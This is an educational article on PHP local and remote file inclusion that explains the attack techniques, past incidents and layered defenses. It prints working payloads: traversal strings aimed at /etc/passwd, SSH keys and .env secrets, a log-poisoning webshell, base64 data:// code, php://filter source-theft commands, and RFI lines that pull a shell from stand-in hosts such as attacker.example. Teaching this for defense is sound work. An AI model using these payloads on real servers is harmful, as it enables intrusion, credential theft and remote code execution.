LFI/RFI Explained — How Local/Remote File Inclusion Works, Attack Techniques, and Defenses

File inclusion vulnerabilities let an attacker inject an arbitrary path or URL into a web application's include / require-style call, causing the server-side process to read and execute attacker-controlled content. When the target is a local file on the server it is called LFI (Local File Inclusion); when it is an external URL it is called RFI (Remote File Inclusion). Even pure LFI goes beyond reading /etc/passwd and reaches RCE via log poisoning, /proc/self/environ, and PHP wrappers. RFI lets the attacker directly execute PHP they host on their own HTTP server, so it almost always lands as one-shot RCE. This article covers the essence of LFI/RFI, the relationship with path traversal, concrete attack techniques, famous incidents, and layered defense centered on allowlists and disabling allow_url_include.

What LFI / RFI Are — When "Reading" Turns Into "Executing" #

PHP's include / require functions read the file at the given path and immediately evaluate it as PHP. They've been heavily used for HTML template inclusion and for the classic page-switching router controlled via a URL parameter (?page=about).

When the code is written as include($_GET['page'].'.php') — passing user input straight into the path — the attacker can send page=../../../../etc/passwd%00 or page=http://evil.example/shell. Because include executes any PHP code it finds in the target, a simple "read a file" operation instantly turns into "run arbitrary code". That is the essence of file inclusion vulnerabilities.

▸ What's possible the moment file inclusion lands

Even LFI alone produces realistic threats: disclosure of sensitive files (/etc/passwd, .env, source code, config files), log poisoning that gets executed as PHP, and RCE via PHP wrappers (php://filter, data://). With RFI, the attacker simply has the server include a shell.txt hosted on their own HTTP server, so it is effectively single-step RCE. If SSRF "uses the server's trust boundary as a pivot", file inclusion "hijacks the server's interpreter".

How LFI and RFI differ #

Item	LFI	RFI
Target	A local file on the server	A remote URL (http://, ftp://, etc.)
Prerequisite	Path manipulation is reachable	External URL include is enabled (`allow_url_include=On`)
Direct RCE?	Possible, but usually multi-step (log poisoning / wrappers)	Almost single-shot
Frequency today	Common (CTFs, legacy maintenance)	Rare (PHP 5.2+ defaults to Off)

PHP changed allow_url_include to default Off in PHP 5.2 (2006), so RFI today only appears in misconfigured environments. LFI on the other hand cannot be killed by configuration — it is a code-level problem — and is still found regularly.

Relationship to Path Traversal #

Path traversal (directory traversal) is the technique name for escaping to higher directories using ../. LFI almost always relies on it, so the attack surface satisfies LFI ⊃ Path Traversal. However, path traversal can also be a pure "read-only" issue (e.g., readfile, fopen); when there's no include in the picture, the impact stops at "a file gets read" and doesn't reach RCE. The gap between "read" and "include + execute" is significant.

Why It Exploded in PHP — Historical and Structural Context #

File inclusion is tightly coupled to PHP's language design. The same hole can in theory appear in Java (RequestDispatcher.include), JSP (<jsp:include>), Ruby (load / require), and Python (__import__), but in practice the casualty count in PHP is orders of magnitude higher. Three reasons:

`include` doesn't "read" — it "executes" #

Most languages' file-reading functions return a string. PHP's include / require / include_once / require_once evaluate the content immediately as PHP. Anything outside <?php tags is emitted as raw HTML/text. Meaning: "the attacker controls the file path" = "the attacker controls code execution" is wired into the language itself.

Classic early-2000s code patterns were vulnerable #

CMSes, forum scripts, and DIY PHP sites all loved the "?page=hoge reads hoge.php" router.

Mass-produced vulnerable code from the 2000s

<?php
// index.php
$page = $_GET['page'];
include($page . '.php');  // ★ vulnerable to both LFI and RFI
# Attack (LFI: read /etc/passwd; on PHP < 5.3.4 cut .php with NULL byte)
http://victim/index.php?page=../../../../etc/passwd%00

# Attack (RFI: execute attacker's PHP) http://victim/index.php?page=http://evil.example/shell

The early phpBB / PHP-Nuke family of CMSes and their plugin ecosystems produced this kind of code at scale, and at the time milw0rm (the predecessor of exploit-db) saw new RFI exploits daily.

`allow_url_include` used to default to On #

Before PHP 5.2, allow_url_include=On was the standard, so include('http://...') simply worked. Even after PHP 5.2 (2006) flipped the default to Off, lots of CMSes and configurations stayed on On for years, which kept RFI a mainstream attack vector through about 2010. Even now there are (usually unintentional) environments with allow_url_include=On.

Why it still doesn't die #

CTFs, HackTheBox, TryHackMe: LFI/RFI is a heavy hitter in web-category problems and continues to be taught as a live technique (EvilBox-One is representative).
Legacy PHP maintenance: Bits of it still live in old WordPress plugins/themes and bespoke CMSes.
Java / Ruby / Python analogues: Not as catastrophic as PHP, but RequestDispatcher.include leaks internal resources, os.path.join traversal leaks .env, and Ruby's render file: produces similar issues.

Major LFI Attack Techniques #

Once LFI lands, the literal capability is "you can read local files". In practice, attackers chain that up to RCE. The standard techniques:

Path traversal to grab sensitive files #

The most basic step. Stack ../ enough times to reach the equivalent absolute path.

Common target files (Linux)

/etc/passwd                       # user list (the standard LFI smoke test)
/etc/shadow                       # readable only if running as root
/etc/hosts                        # internal hostnames
/proc/self/environ                # process env (classic RCE path, see below)
/proc/self/cmdline                # startup command line
/var/log/apache2/access.log       # Apache access log (used for log poisoning)
/var/log/nginx/access.log         # Nginx version
/var/log/auth.log                 # SSH login attempt log
~/.ssh/id_rsa                     # SSH private key
~/.bash_history                   # past commands
/var/www/html/.env                # Laravel/Symfony secrets (DB password etc.)
/var/www/html/config.php          # custom-PHP DB connection info

If the server is Apache + PHP-FPM with web root at /var/www/html/, ../../../../etc/passwd usually hits. If it reads back, LFI is confirmed.

NULL byte (%00) to bypass forced extensions #

Code like include($page.'.php') that forcibly appends an extension on the server side could be cut with a NULL byte on PHP ≤ 5.3.3.

?page=../../../../etc/passwd%00

This abuses C-style "treat %00 as a string terminator" behavior. Patched in PHP 5.3.4 (2010) so modern PHP isn't affected, but legacy 5.2 maintenance and CTFs still feature it.

Filter chain (path normalization bypass) #

Even environments that "block ../" can be defeated with notations like:

....//....//etc/passwd          (single ../ removal leaves a remaining "../")
..%2f..%2f..%2fetc%2fpasswd     (URL-encoded)
..%252f..%252fetc%252fpasswd    (double-encoded — exploits double-decoding differences between middleware and app)
..%c0%afetc/passwd              (UTF-8 overlong encoding, older Windows IIS)

Log Poisoning — the classic LFI-to-RCE pipeline #

Once LFI is in place, if you find a text file you can write to, you can drop PHP code there and have include execute it for RCE. The favorite target is the web server's access log.

1. Write PHP into the log

Send an HTTP request with <?php system($_GET['c']); ?> in the User-Agent. Apache/Nginx append the UA verbatim to access.log.

2. include the log via LFI

?page=../../../../var/log/apache2/access.log loads the file.

3. include evaluates it as PHP

The <?php ... ?> block inside the log is evaluated. Append &c=id for arbitrary command execution.

4. Upgrade to reverse shell / persistence

Re-plant a bash reverse-shell payload in the UA and connect back to the attacker's listener.

This requires log files readable by the web process, but typical permission setups make them readable. A variation targets SSH logs (/var/log/auth.log) by sending ssh '<?php system($_GET["c"]); ?>'@victim so failed-login lines plant the PHP.

/proc/self/environ pathway #

The Linux file /proc/self/environ is a virtual file returning the current process's environment variables as a string. In many old SAPI configurations (CGI / mod_php), the HTTP User-Agent ends up as an environment variable, so just putting PHP into the UA and reading /proc/self/environ via LFI executes it.

GET /index.php?page=../../../../proc/self/environ HTTP/1.1
User-Agent: <?php system($_GET['c']); ?>

Under PHP-FPM and other modern setups, the UA often doesn't end up in environ directly, so it's getting less effective — but it remains a CTF staple.

Session file pathway #

PHP sessions are stored at paths like /var/lib/php/sessions/sess_<SESSIONID>. If a user-controlled field (e.g., a username) ends up in a session variable, the attacker writes PHP into the session file and includes it via LFI.

PHP Wrappers — Levelling Up LFI #

PHP has a stream wrapper mechanism that transparently opens files/streams via schemes like file://, http://, php://, data://, expect://. include honors these too, which expands LFI into a wide variety of attacks.

php://filter — leaking source as Base64 #

php://filter is a wrapper that reads files without executing them, optionally encoding them as Base64. The standard way to steal PHP source via LFI.

Source theft via php://filter

curl "http://victim/index.php?page=php://filter/convert.base64-encode/resource=config"
# Response contains base64-encoded config.php
# → decode to reveal DB credentials, API keys, etc.

# Filters can be chained (ROT13, zlib compression, etc.) curl "http://victim/?page=php://filter/read=convert.base64-encode|zlib.deflate/resource=index"

Normally, trying to read index.php via LFI executes it and you see nothing. Wrapping it through a filter is the trick that exposes the raw source.

data:// — code directly inside the URL #

data://text/plain;base64,... embeds Base64-encoded PHP inside the URL and feeds it to include. Unlike RFI it requires no outbound HTTP, only allow_url_include=On.

?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==
   (decoded: <?php system($_GET['c']); ?>)
&c=id

expect:// — direct command execution #

In environments with PHP's expect extension installed, just writing expect://id runs the command. Not installed by default so it's rare in the wild, but where present, LFI is one-step RCE.

phar:// — RCE via deserialization #

Through PHP 7.x, the phar:// wrapper automatically deserializes the metadata of Phar archives. If LFI can point at an attacker-uploaded .phar (which can be disguised as an image by spoofing magic bytes) via phar://uploads/avatar.jpg/x, the metadata gets deserialized — and if any class with __wakeup() / __destruct() is reachable, gadget chaining produces RCE (Object Injection). Behavior changed in PHP 8.0 to mitigate this, but the attack is still alive in legacy environments.

zip:// and compress.zlib:// #

zip:// lets you include files inside zip archives directly. The technique is to upload a zip via the image upload feature and run ?page=zip://uploads/img.jpg%23shell to execute shell.php inside it.

RFI Patterns and When It Still Appears #

When the precondition (allow_url_include=On or equivalent) is in place, RFI is the simplest possible attack.

Minimal payload #

Minimal RFI

# Host this on your HTTP server (use .txt extension — .php would be executed on YOUR server)
# http://attacker.example/shell.txt
<?php system($_GET['c']); ?>

# Attack URL curl "http://victim/index.php?page=http://attacker.example/shell.txt&c=id" # victim executes

Why the `.txt` extension #

If your attacker server is configured to run PHP, shell.txt would be executed on your server and the victim would only see the result (an empty string). To deliver raw PHP source to the victim, the attacker's server must use an extension that won't be executed.

When RFI still happens today #

allow_url_include=On (default since PHP 5.2 is Off)
The application allows external URLs to be passed to include / require
Or the data:// wrapper is reachable (only allow_url_include=On needed)
Some frameworks / template engines do equivalent operations internally

Note that data:// requires no outbound HTTP, so RFI lands even with strict egress filtering.

Analogues in Java / Ruby / Python #

Language / FW	Equivalent feature	Risk
Java (JSP)	`<jsp:include page="...">` directly bound to user input	Usually limited to servlet-container resources, but configurations can let it fetch external URLs
Ruby (Rails)	`render file: params[:p]` / `send_file params[:p]`	Classic local file disclosure. Rails 5+ disallows external paths for `render file:` by default
Python (Flask)	`render_template(user_input)` with user-controlled template name	Easily becomes Server-Side Template Injection (SSTI)
Node.js (Express)	`res.render(req.query.view)`	Same — template name from input

Without PHP's "read = execute" language design, these are less likely to be direct RCE, but they still produce sensitive-file leaks or RCE via SSTI.

Notable File Inclusion Incidents #

The early-2000s PHP CMS golden age #

phpBB, PHP-Nuke, PostNuke, Mambo, early Joomla, and osCommerce — old OSS CMSes and their plugins shipped RFI bugs all over the place. milw0rm / exploit-db saw new RFI exploits weekly, and automated scanners pwned vulnerable installs at scale. They underpinned web defacement campaigns and the early botnet eras.

EvilBox-One (CTF, 2021) #

A well-known LFI intro machine on VulnHub / HackTheBox-style platforms. The avatar-display feature has an LFI in a URL parameter, and the canonical path is /etc/passwd → id_rsa → SSH → privesc — a textbook "how far can you go from LFI alone" scenario. Our site also covers a writeup of it; it's one of the best lab boxes to internalize the typical LFI exploitation flow.

CVE-2018-1000861 (Jenkins, Stapler) #

Jenkins's Stapler web framework allowed "invoking arbitrary methods on a class via dynamic routing", escalating into multi-stage LFI/SSRF/RCE chains. Not pure file inclusion, but a good reference for the "a filename/path becomes a reflection entry point" extended-family pattern.

CVE-2021-41773 / CVE-2021-42013 (Apache 2.4.49 / 2.4.50) #

Strictly, this is mod_alias path traversal — but with mod_cgi enabled it leads directly from /etc/passwd disclosure to RCE. A leading example of the "LFI/path-traversal that ends at RCE without going through include" pattern, when the path reaches an executable. Massive scanning waves hit Apache servers worldwide the day it dropped.

Repeated WordPress plugin incidents #

Among WordPress's tens of thousands of plugins, sloppy implementations of AJAX endpoints, file manager features, and theme customizers periodically expose file inclusion-class bugs. Example: wp-file-manager (CVE-2020-25213) is technically arbitrary file upload, but the nearby CVE space is full of LFI-flavored issues. "LFI/RFI is a classic that's extinct" is a misconception — at the ecosystem edges, they are still found in everyday operations.

Lessons #

Just not handing user input to PHP's include would have prevented ~90% of historical damage.
An allowlist (a fixed list of allowed page names) makes the entire attack surface vanish.
LFI alone is dangerous, but combined with logs / sessions / PHP wrappers it reaches RCE-class severity.
Path traversal also appears at the OS-library level (the Apache example). Beyond the application, keeping middleware safely patched matters.

Defenses — Layered Defense #

Just like XSS and SSRF, single-control defenses against file inclusion are broken. Combine allowlists, disabling allow_url_include, canonicalization, least privilege, and WAF.

Filename allowlists — top priority #

"Don't bind user input to a path" is the only root cure. Use a fixed list of allowed page names and reject everything else.

PHP — the correct allowlist pattern

<?php
$allowed = ['home', 'about', 'contact', 'pricing'];
$page = $_GET['page'] ?? 'home';
if (!in_array($page, $allowed, true)) {
http_response_code(404);
exit;
}

// ★ Don't concat user input into a path. Use only values that passed in_array. include DIR . '/pages/' . $page . '.php';

Key points:

Enumerate allowed values in code (or DB — same idea).
Always pass true as the third argument to in_array($page, $allowed, true) (strict comparison) — without it, PHP type juggling lets 0 == 'evil' slip through.
Only after passing comparison is the value allowed near the path.

Disable `allow_url_include` / `allow_url_fopen` #

In php.ini:

allow_url_include = Off
allow_url_fopen   = Off    ; if you need it, switch to curl/Guzzle case by case

allow_url_include=Off alone effectively kills both RFI and data://-based attacks. allow_url_fopen also affects file_get_contents('http://...') etc., so if the app needs external URL fetches, migrate them to curl/Guzzle first, then turn it off.

Path-traversal hardening — `realpath` + prefix check #

If you really must use user input in a path, use realpath to resolve symlinks and ../ into a canonical absolute path, then confirm it's prefixed by an allowed directory.

PHP — lock down using realpath

<?php
$baseDir = realpath(__DIR__ . '/pages');
$target  = realpath($baseDir . '/' . $_GET['page'] . '.php');
if ($target === false || strpos($target, $baseDir . DIRECTORY_SEPARATOR) !== 0) {
http_response_code(404);
exit;
}

include $target;

realpath resolves ../ and returns false if the result doesn't exist. The follow-up strpos check confirms the canonical path starts with the allowed directory, blocking escape.

`open_basedir` — physical sandbox #

Setting PHP's open_basedir in php.ini or vhost config physically restricts which directories the PHP process can access.

open_basedir = /var/www/html:/tmp

This alone blocks PHP-level access to /etc/passwd and /proc/self/environ. It is not a complete isolation, so it doesn't replace allowlists — treat it as another layer.

Lock extension and directory #

Combine "force .php as the suffix" and "lock the directory". NULL byte bypass has been closed since PHP 5.3.4, but it's safer to structurally prevent the user from controlling extensions in the first place.

Make logs unreadable by the web process #

To defang log poisoning, set permissions on access.log / auth.log so the web server user (www-data / nginx / apache) cannot read them. Standard Debian/Ubuntu installations often use root:adm 0640, which www-data can't read — but an accidental o+r opens the hole.

WAF and input validation #

WAFs (ModSecurity, AWS WAF, Cloudflare) can block requests containing literals like ../, php://filter, or data://. Not a root cure (URL encoding and double encoding can bypass), but useful as a speed bump during allowlist rollouts and against unknown plugin vulnerabilities.

Least privilege — the last line of defense #

Don't run the web process as root, keep read/write to the minimum directories needed, and separate the SSH-key-holding user from the web user. These alone shrink LFI impact by orders of magnitude.

Testing and Detection #

Manual test playbook #

Hit every place that takes a filename, template name, page name, theme name, or locale name.

Representative test payloads

# 1. Smoke-test with /etc/passwd
?page=../../../../etc/passwd
?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc%2fpasswd
?page=..%252f..%252fetc%252fpasswd
# 2. Steal source with PHP wrappers
?page=php://filter/convert.base64-encode/resource=index
?page=php://filter/convert.base64-encode/resource=config
# 3. data:// for direct PHP exec (needs allow_url_include=On)
?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
# 4. RFI
?page=http://attacker.example/shell.txt
# 5. NULL byte on legacy
?page=../../../../etc/passwd%00

# 6. Log poisoning (PHP in UA, then LFI on the log) User-Agent: <?php system($_GET['c']); ?> ?page=../../../../var/log/apache2/access.log&c=id

Automation tooling #

LFISuite / fimap — LFI detection and auto-exploitation (covers log poisoning, PHP wrappers, RFI)
Burp Suite Intruder — fan out encoding variations in parallel
ffuf / wfuzz — brute force payloads via the FUZZ placeholder
Nuclei — template-based vulnerability scanning; many LFI templates

Static analysis #

Trace "user input → include / require / readfile / file_get_contents data flow". Semgrep / SonarQube / PHPStan-Security have rules for it. Even a one-shot grep:

grep -rn 'include\s*(\s*\$_' --include='*.php'
grep -rn 'require\s*(\s*\$_' --include='*.php'

catches most of the vulnerable code. In code review, the first thing to check is whether $_GET / $_POST / $_REQUEST / $_COOKIE / $_SERVER reaches the argument of include / require.

Production monitoring #

Alert on literal/encoded ../, php://, data://, %00 in WAF / access logs
Block + notify when sensitive paths like /etc/passwd appear in URLs
Treat sudden bursts of 404 / 403 on filename parameters as a scanner signature

Related Attacks #

Attack	Relationship
Path Traversal	A subset technique used by LFI. Often refers to read-only cases that don't reach RCE
Arbitrary File Upload	When the upload destination path is predictable, combine with LFI to reach RCE (the "PHP hidden in an image" trick)
SSRF	Similar to RFI in that "the server fetches an attacker-supplied URL", but SSRF is a general HTTP-client problem. RFI specifically lands as execution through `include`
SSTI (Server-Side Template Injection)	User input ends up as a template name or template content and is evaluated as the template engine's syntax. Cousin to file inclusion in origin
PHP Object Injection	User input flows into `unserialize` and reaches `__wakeup`/`__destruct`-based RCE. The `phar://` wrapper bridges from LFI
Log Injection	Combines with LFI to evolve into log poisoning. The class of bugs that injects CRLF into logs

Summary — 6 things developers must internalize #

File inclusion is the classic of classics, yet it remains a live threat at the PHP-ecosystem edge and in CTF / training. PHP's include-style "read = execute" semantics are convenient, but they have the property that the moment user input lands in a path, the bug is RCE-class.

▸ 6 things developers must internalize

Don't pass user input directly to include / require. Enumerate allowed page names in code and compare with in_array($v, $allowed, true)
Set allow_url_include = Off / allow_url_fopen = Off in php.ini (wipes out RFI and data://)
If path manipulation is truly necessary, canonicalize with realpath and do a prefix check against the allowed directory
Use open_basedir for a physical sandbox; run the web process with least privilege
Make log files unreadable by the web process (log-poisoning defense)
Have the WAF detect ../ / php://filter / data:// / %00 — but treat it as one layer in defense-in-depth, with allowlists as the root

The instinct "filenames are safe to take from outside" is the most dangerous one. In PHP, a path is code, and designs must explicitly forbid it from being something the outside world can touch.